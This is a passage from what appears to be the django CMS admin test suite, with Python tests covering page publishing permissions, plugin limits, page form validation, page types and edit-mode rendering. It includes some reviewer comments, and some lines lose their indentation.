        request.user = admin_user
        page_admin = site._registry[Page]
        # full blown page list. only draft pages are taken into account
        cl_params = [request, page_admin.model, page_admin.list_display,
                     page_admin.list_display_links, page_admin.list_filter,
                     page_admin.date_hierarchy, page_admin.search_fields,
                     page_admin.list_select_related, page_admin.list_per_page]
        if hasattr(page_admin, 'list_max_show_all'):  # django 1.4
            cl_params.append(page_admin.list_max_show_all)
        cl_params.extend([page_admin.list_editable, page_admin])
        cl = CMSChangeList(*tuple(cl_params))
        cl.get_results(request)
        self.assertEqual(cl.full_result_count, 5)
        self.assertEqual(cl.result_count, 5)
        # only one unpublished page is returned
        request = self.get_request(url+'?q=level23')
        request.session = {}
        request.user = admin_user
        cl_params[0] = request
        cl = CMSChangeList(*tuple(cl_params))
        cl.get_results(request)
        self.assertEqual(cl.full_result_count, 5)
        self.assertEqual(cl.result_count, 1)
        # a number of pages matches the query
        request = self.get_request(url+'?q=level2')
        request.session = {}
        request.user = admin_user
        cl_params[0] = request
        cl = CMSChangeList(*tuple(cl_params))
        cl.get_results(request)
        self.assertEqual(cl.full_result_count, 5)
        self.assertEqual(cl.result_count, 3)
    def test_unihandecode_doesnt_break_404_in_admin(self):
        """A change view for a nonexistent page must 404 (or redirect to the
        admin index on Django >= 1.11), not crash."""
        self.get_superuser()
        if get_user_model().USERNAME_FIELD == 'email':
            self.client.login(username='admin@django-cms.org', password='admin@django-cms.org')
        else:
            self.client.login(username='admin', password='admin')
        response = self.client.get(URL_CMS_PAGE_CHANGE_LANGUAGE % (1, 'en'))
        # Since Django 1.11 404 results in redirect to the admin home
        if DJANGO_1_10:
            self.assertEqual(response.status_code, 404)
        else:
            self.assertRedirects(response, reverse('admin:index'))
def test_empty_placeholder_with_nested_plugins(self):
# It's important that this test clears a placeholder
# which only has nested plugins.
# This allows us to catch a strange bug that happened
# under these conditions with the new related name handling.
page_en = create_page("EmptyPlaceholderTestPage (EN)", "nav_playground.html", "en")
ph = page_en.placeholders.get(slot="body")
column_wrapper = add_plugin(ph, "MultiColumnPlugin", "en")
add_plugin(ph, "ColumnPlugin", "en", parent=column_wrapper)
add_plugin(ph, "ColumnPlugin", "en", parent=column_wrapper)
# before cleaning the de placeholder
self.assertEqual(ph.get_plugins('en').count(), 3)
admin_user, staff = self._get_guys()
endpoint = self.get_clear_placeholder_url(ph, language='en')
with self.login_user_context(admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
# After cleaning the de placeholder, en placeholder must still have all the plugins
self.assertEqual(ph.get_plugins('en').count(), 0)
def test_empty_placeholder_in_correct_language(self):
"""
Test that Cleaning a placeholder only affect current language contents
"""
# create some objects
page_en = create_page("EmptyPlaceholderTestPage (EN)", "nav_playground.html", "en")
ph = page_en.placeholders.get(slot="body")
# add the text plugin to the en version of the page
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 1")
add_plugin(ph, "TextPlugin", "en", body="Hello World EN 2")
# creating a de title of the page and adding plugins to it
create_title("de", page_en.get_title(), page_en, slug=page_en.get_slug())
add_plugin(ph, "TextPlugin", "de", body="Hello World DE")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 2")
add_plugin(ph, "TextPlugin", "de", body="Hello World DE 3")
# before cleaning the de placeholder
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 3)
admin_user, staff = self._get_guys()
endpoint = self.get_clear_placeholder_url(ph, language='de')
with self.login_user_context(admin_user):
response = self.client.post(endpoint, {'test': 0})
self.assertEqual(response.status_code, 302)
# After cleaning the de placeholder, en placeholder must still have all the plugins
self.assertEqual(ph.get_plugins('en').count(), 2)
self.assertEqual(ph.get_plugins('de').count(), 0)
class AdminTests(AdminTestsBase):
    # Exercises the custom PageAdmin endpoints (publish/unpublish,
    # in-navigation toggle, preview, plugin limits, title editing) for a
    # superuser versus a staff user holding no CMS permissions.
    # TODO: needs tests for actual permissions, not only superuser/normaluser

    def setUp(self):
        # One fresh, unpublished draft page per test.
        self.page = create_page("testpage", "nav_playground.html", "en")

    def get_admin(self):
        # Creates and returns a staff superuser. The password is set to the
        # value of the username field so tests can log in with matching
        # credentials regardless of the active user model.
        User = get_user_model()

        fields = dict(email="admin@django-cms.org", is_staff=True, is_superuser=True)

        if (User.USERNAME_FIELD != 'email'):
            fields[User.USERNAME_FIELD] = "admin"

        usr = User(**fields)
        usr.set_password(getattr(usr, User.USERNAME_FIELD))
        usr.save()
        return usr

    def get_permless(self):
        # Creates and returns a staff user without superuser status and
        # without any CMS permissions.
        User = get_user_model()

        fields = dict(email="permless@django-cms.org", is_staff=True)

        if (User.USERNAME_FIELD != 'email'):
            fields[User.USERNAME_FIELD] = "permless"

        usr = User(**fields)
        usr.set_password(getattr(usr, User.USERNAME_FIELD))
        usr.save()
        return usr

    def get_page(self):
        # Accessor for the page created in setUp.
        return self.page

    def test_change_publish_unpublish(self):
        # publish_page: 405 on GET, 403 for a permissionless POST; a superuser
        # can publish (302) and subsequently unpublish (302).
        page = self.get_page()
        permless = self.get_permless()
        with self.login_user_context(permless):
            request = self.get_request()
            response = self.admin_class.publish_page(request, page.pk, "en")
            self.assertEqual(response.status_code, 405)
            page = self.reload(page)
            self.assertFalse(page.is_published('en'))

            request = self.get_request(post_data={'no': 'data'})
            response = self.admin_class.publish_page(request, page.pk, "en")
            self.assertEqual(response.status_code, 403)
            page = self.reload(page)
            self.assertFalse(page.is_published('en'))

        admin_user = self.get_admin()
        with self.login_user_context(admin_user):
            request = self.get_request(post_data={'no': 'data'})
            response = self.admin_class.publish_page(request, page.pk, "en")
            self.assertEqual(response.status_code, 302)
            page = self.reload(page)
            self.assertTrue(page.is_published('en'))

            response = self.admin_class.unpublish(request, page.pk, "en")
            self.assertEqual(response.status_code, 302)
            page = self.reload(page)
            self.assertFalse(page.is_published('en'))

    def test_change_status_adds_log_entry(self):
        # Publishing through the admin must create exactly one LogEntry
        # referencing the published page.
        page = self.get_page()
        admin_user = self.get_admin()
        with self.login_user_context(admin_user):
            request = self.get_request(post_data={'no': 'data'})
            self.assertFalse(LogEntry.objects.count())
            response = self.admin_class.publish_page(request, page.pk, "en")
            self.assertEqual(response.status_code, 302)
            self.assertEqual(1, LogEntry.objects.count())
            self.assertEqual(page.pk, int(LogEntry.objects.all()[0].object_id))

    def test_change_innavigation(self):
        # change_innavigation: 405 on GET, 403 without permission, Http404 for
        # an unknown page id, and a 204 toggle for a superuser.
        page = self.get_page()
        permless = self.get_permless()
        admin_user = self.get_admin()
        with self.login_user_context(permless):
            request = self.get_request()
            response = self.admin_class.change_innavigation(request, page.pk)
            self.assertEqual(response.status_code, 405)
        with self.login_user_context(permless):
            request = self.get_request(post_data={'no': 'data'})
            response = self.admin_class.change_innavigation(request, page.pk)
            self.assertEqual(response.status_code, 403)
        with self.login_user_context(permless):
            request = self.get_request(post_data={'no': 'data'})
            # page.pk + 100 does not exist, so the view must raise Http404.
            self.assertRaises(Http404, self.admin_class.change_innavigation,
                              request, page.pk + 100)
        with self.login_user_context(permless):
            request = self.get_request(post_data={'no': 'data'})
            response = self.admin_class.change_innavigation(request, page.pk)
            self.assertEqual(response.status_code, 403)
        with self.login_user_context(admin_user):
            request = self.get_request(post_data={'no': 'data'})
            old = page.in_navigation
            response = self.admin_class.change_innavigation(request, page.pk)
            self.assertEqual(response.status_code, 204)
            page = self.reload(page)
            # The flag must have been flipped.
            self.assertEqual(old, not page.in_navigation)

    def test_publish_page_requires_perms(self):
        # A POST from a permissionless user is rejected with 403.
        permless = self.get_permless()
        with self.login_user_context(permless):
            request = self.get_request()
            request.method = "POST"
            response = self.admin_class.publish_page(request, Page.objects.all()[0].pk, "en")
            self.assertEqual(response.status_code, 403)

    def test_remove_plugin_requires_post(self):
        # A GET on the delete-plugin endpoint renders a confirmation page
        # (200) instead of deleting anything.
        ph = Placeholder.objects.create(slot='test')
        plugin = add_plugin(ph, 'TextPlugin', 'en', body='test')
        admin_user = self.get_admin()
        with self.login_user_context(admin_user):
            endpoint = self.get_delete_plugin_uri(plugin)
            response = self.client.get(endpoint)
            self.assertEqual(response.status_code, 200)

    def test_move_language(self):
        # Moving a child plugin under a parent of another language must also
        # switch the moved plugin's language.
        # NOTE(review): `target` is unpacked but never used below.
        page = self.get_page()
        source, target = list(page.placeholders.all())[:2]
        col = add_plugin(source, 'MultiColumnPlugin', 'en')
        sub_col = add_plugin(source, 'ColumnPlugin', 'en', target=col)
        col2 = add_plugin(source, 'MultiColumnPlugin', 'de')

        admin_user = self.get_admin()
        with self.login_user_context(admin_user):
            data = {
                'plugin_id': sub_col.pk,
                'placeholder_id': source.id,
                'plugin_parent': col2.pk,
                'plugin_language': 'de'
            }
            endpoint = self.get_move_plugin_uri(sub_col)
            response = self.client.post(endpoint, data)
            self.assertEqual(response.status_code, 200)
        sub_col = CMSPlugin.objects.get(pk=sub_col.pk)
        self.assertEqual(sub_col.language, "de")
        self.assertEqual(sub_col.parent_id, col2.pk)

    def test_preview_page(self):
        # preview_page 404s for a missing page and otherwise redirects to the
        # page URL with edit-mode parameters; for a page on another site the
        # redirect is absolute (scheme + domain).
        permless = self.get_permless()
        with self.login_user_context(permless):
            request = self.get_request()
            self.assertRaises(Http404, self.admin_class.preview_page, request, 404, "en")
        page = self.get_page()
        page.publish("en")
        Page.set_homepage(page)
        base_url = page.get_absolute_url()
        with self.login_user_context(permless):
            request = self.get_request('/?public=true')
            response = self.admin_class.preview_page(request, page.pk, 'en')
            self.assertEqual(response.status_code, 302)
            self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
            request = self.get_request()
            response = self.admin_class.preview_page(request, page.pk, 'en')
            self.assertEqual(response.status_code, 302)
            self.assertEqual(response['Location'], '%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))
            current_site = Site.objects.create(domain='django-cms.org', name='django-cms')
            page.site = current_site
            page.save()
            page.publish("en")
            self.assertTrue(page.is_home)
            response = self.admin_class.preview_page(request, page.pk, 'en')
            self.assertEqual(response.status_code, 302)
            self.assertEqual(response['Location'],
                             'http://django-cms.org%s?%s&language=en' % (base_url, get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')))

    def test_too_many_plugins_global(self):
        # With a global per-placeholder limit of 1, adding a second plugin of
        # any type must be rejected with 400.
        conf = {
            'body': {
                'limits': {
                    'global': 1,
                },
            },
        }
        admin_user = self.get_admin()
        url = admin_reverse('cms_page_add_plugin')
        with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
            page = create_page('somepage', 'nav_playground.html', 'en')
            body = page.placeholders.get(slot='body')
            add_plugin(body, 'TextPlugin', 'en', body='text')
            with self.login_user_context(admin_user):
                data = {
                    'plugin_type': 'TextPlugin',
                    'placeholder_id': body.pk,
                    'plugin_language': 'en',
                }
                response = self.client.post(url, data)
                self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)

    def test_too_many_plugins_type(self):
        # With a per-type limit of 1 for TextPlugin, a second TextPlugin must
        # be rejected with 400.
        conf = {
            'body': {
                'limits': {
                    'TextPlugin': 1,
                },
            },
        }
        admin_user = self.get_admin()
        url = admin_reverse('cms_page_add_plugin')
        with self.settings(CMS_PERMISSION=False, CMS_PLACEHOLDER_CONF=conf):
            page = create_page('somepage', 'nav_playground.html', 'en')
            body = page.placeholders.get(slot='body')
            add_plugin(body, 'TextPlugin', 'en', body='text')
            with self.login_user_context(admin_user):
                data = {
                    'plugin_type': 'TextPlugin',
                    'placeholder_id': body.pk,
                    'plugin_language': 'en',
                    'plugin_parent': '',
                }
                response = self.client.post(url, data)
                self.assertEqual(response.status_code, HttpResponseBadRequest.status_code)

    def test_edit_title_dirty_bit(self):
        # Editing a title through the admin endpoint must mark the draft
        # translation as dirty (pending changes).
        language = "en"
        admin_user = self.get_admin()
        page = create_page('A', 'nav_playground.html', language)
        page_admin = PageAdmin(Page, None)
        page_admin._current_page = page
        page.publish("en")
        draft_page = page.get_draft_object()
        admin_url = reverse("admin:cms_page_edit_title_fields", args=(
            draft_page.pk, language
        ))

        post_data = {
            'title': "A Title"
        }
        with self.login_user_context(admin_user):
            self.client.post(admin_url, post_data)
            draft_page = Page.objects.get(pk=page.pk).get_draft_object()
            self.assertTrue(draft_page.is_dirty('en'))

    def test_edit_title_languages(self):
        # NOTE(review): this test body is identical to test_edit_title_dirty_bit
        # above — presumably it was meant to exercise multiple languages;
        # confirm the original intent before consolidating.
        language = "en"
        admin_user = self.get_admin()
        page = create_page('A', 'nav_playground.html', language)
        page_admin = PageAdmin(Page, None)
        page_admin._current_page = page
        page.publish("en")
        draft_page = page.get_draft_object()
        admin_url = reverse("admin:cms_page_edit_title_fields", args=(
            draft_page.pk, language
        ))

        post_data = {
            'title': "A Title"
        }
        with self.login_user_context(admin_user):
            self.client.post(admin_url, post_data)
            draft_page = Page.objects.get(pk=page.pk).get_draft_object()
            self.assertTrue(draft_page.is_dirty('en'))

    def test_page_form_leak(self):
        # get_form must not leak initial values from an edit form into a
        # subsequently built add form.
        language = "en"
        admin_user = self.get_admin()
        request = self.get_request('/', 'en')
        request.user = admin_user
        page = create_page('A', 'nav_playground.html', language, menu_title='menu title')
        page_admin = PageAdmin(Page, site)
        page_admin._current_page = page

        edit_form = page_admin.get_form(request, page)
        add_form = page_admin.get_form(request, None)

        self.assertEqual(edit_form.base_fields['menu_title'].initial, 'menu title')
        self.assertEqual(add_form.base_fields['menu_title'].initial, None)
class NoDBAdminTests(CMSTestCase):
    """Changelist-lookup checks on PageAdmin that never touch the database."""

    @property
    def admin_class(self):
        """The PageAdmin instance registered on the default admin site."""
        return site._registry[Page]

    def test_lookup_allowed_site__exact(self):
        """``site__exact`` must be a permitted changelist lookup."""
        allowed = self.admin_class.lookup_allowed('site__exact', '1')
        self.assertTrue(allowed)

    def test_lookup_allowed_published(self):
        """``published`` must be a permitted changelist lookup."""
        allowed = self.admin_class.lookup_allowed('published', value='1')
        self.assertTrue(allowed)
class PluginPermissionTests(AdminTestsBase):
    # Permission helpers plus a regression test for editing a plugin through a
    # malformed URL.

    def setUp(self):
        # One page with its first placeholder cached for the helpers below.
        self._page = create_page('test page', 'nav_playground.html', 'en')
        self._placeholder = self._page.placeholders.all()[0]

    def _get_admin(self):
        # Creates a staff + active user (NOT a superuser) with password 'admin'.
        User = get_user_model()

        fields = dict(email="admin@django-cms.org", is_staff=True, is_active=True)

        if (User.USERNAME_FIELD != 'email'):
            fields[User.USERNAME_FIELD] = "admin"

        admin_user = User(**fields)
        admin_user.set_password('admin')
        admin_user.save()
        return admin_user

    def _get_page_admin(self):
        # The PageAdmin instance registered on the default admin site.
        return admin.site._registry[Page]

    def _give_permission(self, user, model, permission_type, save=True):
        # Grants the model-level permission, e.g. 'change_page'.
        # NOTE(review): the `save` argument is accepted but never used here;
        # callers pass it (see _give_cms_permissions) expecting it to matter.
        codename = '%s_%s' % (permission_type, model._meta.object_name.lower())
        user.user_permissions.add(Permission.objects.get(codename=codename))

    def _give_page_permission_rights(self, user):
        # Grants add/change/delete on the PagePermission model.
        self._give_permission(user, PagePermission, 'add')
        self._give_permission(user, PagePermission, 'change')
        self._give_permission(user, PagePermission, 'delete')

    def _get_change_page_request(self, user, page):
        # Builds a minimal request-like object for permission checks.
        return type('Request', (object,), {
            'user': user,
            'path': base.URL_CMS_PAGE_CHANGE % page.pk
        })

    def _give_cms_permissions(self, user, save=True):
        # Grants model permissions on Page/Title plus a GlobalPagePermission
        # covering all sites.
        for perm_type in ['add', 'change', 'delete']:
            for model in [Page, Title]:
                self._give_permission(user, model, perm_type, False)
        gpp = GlobalPagePermission.objects.create(
            user=user,
            can_change=True,
            can_delete=True,
            can_change_advanced_settings=False,
            can_publish=True,
            can_change_permissions=False,
            can_move_page=True,
        )
        gpp.sites = Site.objects.all()
        if save:
            user.save()

    def _create_plugin(self):
        # Adds a TextPlugin to the cached placeholder and returns it.
        plugin = add_plugin(self._placeholder, 'TextPlugin', 'en')
        return plugin

    def test_plugin_edit_wrong_url(self):
        """User tries to edit a plugin using a random url. 404 response returned"""
        plugin = self._create_plugin()
        _, normal_guy = self._get_guys()

        if get_user_model().USERNAME_FIELD == 'email':
            self.client.login(username='test@test.com', password='test@test.com')
        else:
            self.client.login(username='test', password='test')

        self._give_permission(normal_guy, Text, 'change')
        # Doubly-suffixed URL that matches no admin route for this plugin.
        url = '%s/edit-plugin/%s/' % (admin_reverse('cms_page_edit_plugin', args=[plugin.id]), plugin.id)
        response = self.client.post(url, dict())

        self.assertEqual(response.status_code, HttpResponseNotFound.status_code)
        self.assertTrue("Plugin not found" in force_text(response.content))
class AdminFormsTests(AdminTestsBase):
    """Validation behaviour of PageForm / AdvancedSettingsForm and the admin
    endpoints built on top of them.

    Fixes applied in review:
    - restored ``&copy_target`` query parameters that had been corrupted into
      the ``©`` character by HTML-entity mangling (``&copy`` → ©);
    - renamed local ``curren_site`` → ``current_site`` (typo);
    - renamed local ``admin`` → ``admin_user`` in
      test_smart_link_published_pages to stop shadowing the
      ``django.contrib.admin`` module import.
    """

    def test_clean_overwrite_url(self):
        """A well-formed ``overwrite_url`` validates both on create and edit."""
        user = AnonymousUser()
        user.is_superuser = True
        user.pk = 1
        request = type('Request', (object,), {'user': user})
        with self.settings():
            data = {
                'title': 'TestPage',
                'slug': 'test-page',
                'language': 'en',
                'overwrite_url': '/overwrite/url/',
                'site': Site.objects.get_current().pk,
                'template': get_cms_setting('TEMPLATES')[0][0],
                'published': True
            }

            form = PageForm(data)
            self.assertTrue(form.is_valid(), form.errors.as_text())
            instance = form.save()
            instance.permission_user_cache = user
            instance.permission_advanced_settings_cache = True
            Title.objects.set_or_create(request, instance, form, 'en')
            # Re-binding the same data against the saved instance must still validate.
            form = PageForm(data, instance=instance)
            self.assertTrue(form.is_valid(), form.errors.as_text())

    def test_missmatching_site_parent_dotsite(self):
        """A child page whose site differs from its parent's site is rejected."""
        site0 = Site.objects.create(domain='foo.com', name='foo.com')
        site1 = Site.objects.create(domain='foo2.com', name='foo.com')
        parent_page = Page.objects.create(
            template='nav_playground.html',
            site=site0)
        new_page_data = {
            'title': 'Title',
            'slug': 'slug',
            'language': 'en',
            'site': site1.pk,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
            'parent': parent_page.pk,
        }
        form = PageForm(data=new_page_data, files=None)
        self.assertFalse(form.is_valid())
        self.assertIn(u"Site doesn't match the parent's page site",
                      form.errors['__all__'])

    def test_form_errors(self):
        """PageForm rejects: an unknown site, a parent on another site, an
        invalid slug, an unknown language, a duplicate slug, and a path
        conflict on move-to-root."""
        # Unknown site id.
        new_page_data = {
            'title': 'Title',
            'slug': 'home',
            'language': 'en',
            'site': 10,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
        }
        form = PageForm(data=new_page_data, files=None)
        self.assertFalse(form.is_valid())

        # Parent page lives on a different site than the form's 'site' value.
        site0 = Site.objects.create(domain='foo.com', name='foo.com', pk=2)
        page1 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "fr", site=site0)
        new_page_data = {
            'title': 'Title',
            'slug': 'home',
            'language': 'en',
            'site': 1,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
            'parent': page1.pk,
        }
        form = PageForm(data=new_page_data, files=None)
        self.assertFalse(form.is_valid())

        # '#' is not a valid slug.
        new_page_data = {
            'title': 'Title',
            'slug': '#',
            'language': 'en',
            'site': 1,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
        }
        form = PageForm(data=new_page_data, files=None)
        self.assertFalse(form.is_valid())

        # 'pp' is not a configured language.
        new_page_data = {
            'title': 'Title',
            'slug': 'home',
            'language': 'pp',
            'site': 1,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
            'parent': '',
        }
        form = PageForm(data=new_page_data, files=None)
        self.assertFalse(form.is_valid())

        # Duplicate slug at the same tree level.
        page2 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en")
        new_page_data = {
            'title': 'Title',
            'slug': 'test',
            'language': 'en',
            'site': 1,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
            'parent': '',
        }
        form = PageForm(data=new_page_data, files=None)
        self.assertFalse(form.is_valid())

        # Moving page3 to the root would clash with page2's existing path.
        page3 = api.create_page("test", get_cms_setting('TEMPLATES')[0][0], "en", parent=page2)
        page3.title_set.update(path="hello/")
        page3 = page3.reload()
        new_page_data = {
            'title': 'Title',
            'slug': 'test',
            'language': 'en',
            'site': 1,
            'template': get_cms_setting('TEMPLATES')[0][0],
            'reverse_id': '',
            'parent': '',
        }
        form = PageForm(data=new_page_data, files=None, instance=page3)
        self.assertFalse(form.is_valid())

    def test_reverse_id_error_location(self):
        ''' Test moving the reverse_id validation error to a field specific one '''
        # this is the Reverse ID we'll re-use to break things.
        dupe_id = 'p1'
        current_site = Site.objects.get_current()
        create_page('Page 1', 'nav_playground.html', 'en', reverse_id=dupe_id)
        page2 = create_page('Page 2', 'nav_playground.html', 'en')

        # Assemble a bunch of data to test the page form
        page2_data = {
            'language': 'en',
            'site': current_site.pk,
            'reverse_id': dupe_id,
            'template': 'col_two.html',
        }
        form = AdvancedSettingsForm(
            data=page2_data,
            instance=page2,
            files=None,
        )
        self.assertFalse(form.is_valid())

        # reverse_id is the only item that is in __all__ as every other field
        # has it's own clean method. Moving it to be a field error means
        # __all__ is now not available.
        self.assertNotIn('__all__', form.errors)

        # In moving it to it's own field, it should be in form.errors, and
        # the values contained therein should match these.
        self.assertIn('reverse_id', form.errors)
        self.assertEqual(1, len(form.errors['reverse_id']))
        self.assertEqual([u'A page with this reverse URL id exists already.'],
                         form.errors['reverse_id'])

        # Clearing the duplicate reverse_id makes the form valid again.
        page2_data['reverse_id'] = ""
        form = AdvancedSettingsForm(
            data=page2_data,
            instance=page2,
            files=None,
        )
        self.assertTrue(form.is_valid())

        admin_user = self._get_guys(admin_only=True)
        # reset some of page2_data so we can use cms.api.create_page
        page2 = page2.reload()
        page2.site = current_site
        page2.save()
        with self.login_user_context(admin_user):
            # re-reset the page2_data for the admin form instance.
            page2_data['reverse_id'] = dupe_id
            page2_data['site'] = current_site.pk

            # post to the admin change form for page 2, and test that the
            # reverse_id form row has an errors class. Django's admin avoids
            # collapsing these, so that the error is visible.
            resp = self.client.post(base.URL_CMS_PAGE_ADVANCED_CHANGE % page2.pk, page2_data)
            self.assertContains(resp, '<div class="form-row errors field-reverse_id">')

    def test_advanced_settings_endpoint(self):
        """The advanced-settings view saves and redirects appropriately per
        language, and refuses to save for a translation without a slug."""
        admin_user = self.get_superuser()
        site = Site.objects.get_current()
        page = create_page('Page 1', 'nav_playground.html', 'en')
        page_data = {
            'language': 'en',
            'site': site.pk,
            'template': 'col_two.html',
        }
        path = admin_reverse('cms_page_advanced', args=(page.pk,))

        with self.login_user_context(admin_user):
            en_path = path + u"?language=en"
            redirect_path = admin_reverse('cms_page_changelist') + '?language=en'
            response = self.client.post(en_path, page_data)
            self.assertRedirects(response, redirect_path)
            self.assertEqual(Page.objects.get(pk=page.pk).template, 'col_two.html')

        # Now switch it up by adding german as the current language
        # Note that german has not been created as page translation.
        page_data['language'] = 'de'
        page_data['template'] = 'nav_playground.html'

        with self.login_user_context(admin_user):
            de_path = path + u"?language=de"
            redirect_path = admin_reverse('cms_page_change', args=(page.pk,)) + '?language=de'
            response = self.client.post(de_path, page_data)
            # Assert user is redirected to basic settings.
            self.assertRedirects(response, redirect_path)
            # Make sure no change was made
            self.assertEqual(Page.objects.get(pk=page.pk).template, 'col_two.html')

        de_translation = create_title('de', title='Page 1', page=page.reload())
        de_translation.slug = ''
        de_translation.save()

        # Now try again but slug is set to empty string.
        page_data['language'] = 'de'
        page_data['template'] = 'nav_playground.html'

        with self.login_user_context(admin_user):
            de_path = path + u"?language=de"
            response = self.client.post(de_path, page_data)
            # Assert user is not redirected because there was a form error
            self.assertEqual(response.status_code, 200)
            # Make sure no change was made
            self.assertEqual(Page.objects.get(pk=page.pk).template, 'col_two.html')

        de_translation.slug = 'someslug'
        de_translation.save()

        # Now try again but with the title having a slug.
        page_data['language'] = 'de'
        page_data['template'] = 'nav_playground.html'

        with self.login_user_context(admin_user):
            en_path = path + u"?language=de"
            redirect_path = admin_reverse('cms_page_changelist') + '?language=de'
            response = self.client.post(en_path, page_data)
            self.assertRedirects(response, redirect_path)
            self.assertEqual(Page.objects.get(pk=page.pk).template, 'nav_playground.html')

    def test_advanced_settings_endpoint_fails_gracefully(self):
        """A Django-level field error must short-circuit clean() instead of
        raising on missing cleaned_data keys."""
        admin_user = self.get_superuser()
        site = Site.objects.get_current()
        page = create_page('Page 1', 'nav_playground.html', 'en')
        page_data = {
            'language': 'en',
            'site': site.pk,
            'template': 'col_two.html',
        }
        path = admin_reverse('cms_page_advanced', args=(page.pk,))

        # It's important to test fields that are validated
        # automatically by Django vs fields that are validated
        # via the clean() method by us.
        # Fields validated by Django will not be in cleaned data
        # if they have an error so if we rely on these in the clean()
        # method then an error will be raised.

        # So test that the form short circuits if there's errors.
        page_data['application_urls'] = 'TestApp'
        page_data['site'] = '1000'

        with self.login_user_context(admin_user):
            de_path = path + u"?language=de"
            response = self.client.post(de_path, page_data)
            # Assert user is not redirected because there was a form error
            self.assertEqual(response.status_code, 200)

            page = page.reload()
            # Make sure no change was made
            self.assertEqual(page.application_urls, None)
            self.assertEqual(page.site.pk, site.pk)

    def test_create_page_type(self):
        """The add-page-type endpoint creates the page_types holder, copies
        plugins, and exposes the page_type selector only when appropriate."""
        page = create_page('Test', 'static.html', 'en', published=True, reverse_id="home")
        for placeholder in Placeholder.objects.all():
            add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
        page.publish('en')
        self.assertEqual(Page.objects.count(), 2)
        self.assertEqual(CMSPlugin.objects.count(), 4)
        superuser = self.get_superuser()
        with self.login_user_context(superuser):
            response = self.client.get(
                "%s?copy_target=%s&language=%s" % (admin_reverse("cms_page_add_page_type"), page.pk, 'en'))
            self.assertEqual(response.status_code, 302)
            self.assertEqual(Page.objects.count(), 3)
            self.assertEqual(Page.objects.filter(reverse_id="page_types").count(), 1)
            page_types = Page.objects.get(reverse_id='page_types')
            url = response.url if hasattr(response, 'url') else response['Location']
            expected_url_params = QueryDict(
                'target=%s&position=first-child&add_page_type=1&copy_target=%s&language=en' % (page_types.pk, page.pk))
            response_url_params = QueryDict(urlparse(url).query)
            self.assertDictEqual(expected_url_params, response_url_params)
            response = self.client.get("%s?copy_target=%s&language=%s" % (
                admin_reverse("cms_page_add_page_type"), page.pk, 'en'), follow=True)
            self.assertEqual(response.status_code, 200)

            # test no page types if no page types there
            response = self.client.get(admin_reverse('cms_page_add'))
            self.assertNotContains(response, "page_type")
            # create out first page type
            page_data = {
                'title': 'type1', 'slug': 'type1', '_save': 1, 'template': 'static.html', 'site': 1,
                'language': 'en'
            }
            response = self.client.post(
                "%s?target=%s&position=first-child&add_page_type=1&copy_target=%s&language=en" % (
                    URL_CMS_PAGE_ADD, page_types.pk, page.pk
                ), data=page_data)
            self.assertEqual(response.status_code, 302)
            self.assertEqual(Page.objects.count(), 4)
            self.assertEqual(CMSPlugin.objects.count(), 6)
            response = self.client.get(admin_reverse('cms_page_add'))
            self.assertContains(response, "page_type")
            # no page types available if you use the copy_target
            response = self.client.get("%s?copy_target=%s&language=en" % (admin_reverse('cms_page_add'), page.pk))
            self.assertNotContains(response, "page_type")

    def test_render_edit_mode(self):
        """Edit mode renders plugin content and creates the expected number of
        (static) placeholders for a logged-in superuser."""
        from django.core.cache import cache

        cache.clear()

        homepage = create_page('Test', 'static.html', 'en', published=True)
        Page.set_homepage(homepage)

        for placeholder in Placeholder.objects.all():
            add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')

        user = self.get_superuser()
        self.assertEqual(Placeholder.objects.all().count(), 4)
        with self.login_user_context(user):
            output = force_text(
                self.client.get(
                    '/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
                ).content
            )
            self.assertIn('<b>Test</b>', output)
            # Rendering in edit mode materialises the public/static placeholders.
            self.assertEqual(Placeholder.objects.all().count(), 9)
            self.assertEqual(StaticPlaceholder.objects.count(), 2)
            for placeholder in Placeholder.objects.all():
                add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')
            output = force_text(
                self.client.get(
                    '/en/?%s' % get_cms_setting('CMS_TOOLBAR_URL__EDIT_ON')
                ).content
            )
            self.assertIn('<b>Test</b>', output)

    def test_tree_view_queries(self):
        """The page tree changelist must stay within a bounded query count."""
        from django.core.cache import cache

        cache.clear()
        for i in range(10):
            create_page('Test%s' % i, 'col_two.html', 'en', published=True)
        for placeholder in Placeholder.objects.all():
            add_plugin(placeholder, TextPlugin, 'en', body='<b>Test</b>')

        user = self.get_superuser()
        with self.login_user_context(user):
            with self.assertNumQueries(FuzzyInt(12, 22)):
                force_text(self.client.get(URL_CMS_PAGE))

    def test_smart_link_published_pages(self):
        """The published-pages JSON endpoint is AJAX-only and searchable by
        title, menu title, overwritten URL, and page title."""
        admin_user, staff_guy = self._get_guys()
        page_url = URL_CMS_PAGE_PUBLISHED  # Not sure how to achieve this with reverse...
        create_page('home', 'col_two.html', 'en', published=True)

        with self.login_user_context(staff_guy):
            multi_title_page = create_page('main_title', 'col_two.html', 'en', published=True,
                                           overwrite_url='overwritten_url',
                                           menu_title='menu_title')

            title = multi_title_page.get_title_obj()
            title.page_title = 'page_title'
            title.save()

            multi_title_page.save()
            publish_page(multi_title_page, admin_user, 'en')

            # Non ajax call should return a 403 as this page shouldn't be accessed by anything else but ajax queries
